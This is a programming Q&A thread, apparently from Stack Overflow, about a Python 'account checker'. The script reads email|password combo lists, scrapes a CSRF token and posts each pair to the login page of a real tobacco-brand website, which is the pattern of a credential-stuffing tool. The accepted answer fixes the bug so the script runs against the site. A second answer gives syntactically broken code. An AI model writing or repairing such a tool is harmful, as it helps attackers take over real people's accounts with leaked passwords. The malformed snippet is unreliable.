# How to Fix AttributeError: module 'requests.sessions' has no attribute 'post'

Tags: python

I want to create account checker with python

These is my code

```
    import requests
from bs4 import BeautifulSoup

class output(object):
    def tested(self, email, password):
        print(f" Posted: {email} {password}")


# Get CSRF TOKEN
class checker_start(object):
    def get_token(self):
        data = requests.get("https://www.marlboro.id/auth/login")
        soup = BeautifulSoup(data.text, "lxml")
        decide_csrf = soup.find("input", {"name": "decide_csrf"})["value"]
        return decide_csrf

    def post(self, combo):
        decide_csrf = self.get_token()
        email = combo[0]
        password = combo [1]
        api = requests.sessions
        # Creating POST METHOD #
        param = {"_method": "POST", "decide_csrf": decide_csrf, "email": email, "password": password}
        source = api.post("https://www.marlboro.id/auth/login", data=param).text

        if """<div class="err__msg-big">Opps!</div>""" in source:
            output().tested(email, password)
        else:
            output().tested(email, password)

    def start(self):
        file = input("Please input your txt file: ")
        data = open(file, "r").readlines()
        data_s = [lines.replace("\n", " ") for lines in data]
        for lines in data_s:
            combo = lines.split("|")
            self.post(combo)

if __name__ == "__main__":
    checker_start().start()
```

But when I run these code the output is:

> Traceback (most recent call last):   File
>   "/Users/erzajullian/PycharmProjects/Checker/marlboro.py", line 39, in
>   
>       checker_start().start()   File "/Users/erzajullian/PycharmProjects/Checker/marlboro.py", line 36, in
>   start
>       self.post(combo)   File "/Users/erzajullian/PycharmProjects/Checker/marlboro.py", line 23, in
>   post
>       source = api.post("https://www.marlboro.id/auth/login", data=param).text AttributeError: module 'requests.sessions' has no
>   attribute 'post'

How to solve these problem? Thank you

Comment: Did you try `api = requests.Session()` instead of `requests.sessions`?

Comment: Hi, i just tried to edit   api = requests.sessions(), but the output still error

Comment: TypeError: 'module' object is not callable

Comment: At which point the new error occurs? You can see the docs on session usage here indeed: http://docs.python-requests.org/en/master/user/advanced/

Answer (score 1, accepted):

You have

```
api = requests.sessions
```

`api` is not the requests module after this point, so it has no `post()` method.

If you replace

```
source = api.post("https://www.marlboro.id/auth/login", data=param).text
```

with

```
source = requests.post("https://www.marlboro.id/auth/login", data=param).text
```

Does that fix things? If so, you can remove the `api = requests.sessions` line.)

Comment: Thank you I've just replace that code and it solved. So I just need to changed the api with request?

Comment: I think so - though I'm not sure what the intent of the `api = requests.sessions` line was in the first place.

Answer (score 0):

First of all you'll have to change your code a bit. Post request should be handeled differently.

```
import requests
with requests.Sessions as s:
    # Define headers which you will get via post request
    Headers = {'user-agent':'YOUR_HEADERS'}
    url = 'some_url'
    login_data{
    'username':'user',
    'password':'password'
    # Any other login data your site requires}
    r = s.post(url, data=login_data, headers=Headers)
    # now you can use r.content to parse given html in bs4
```

hope this helps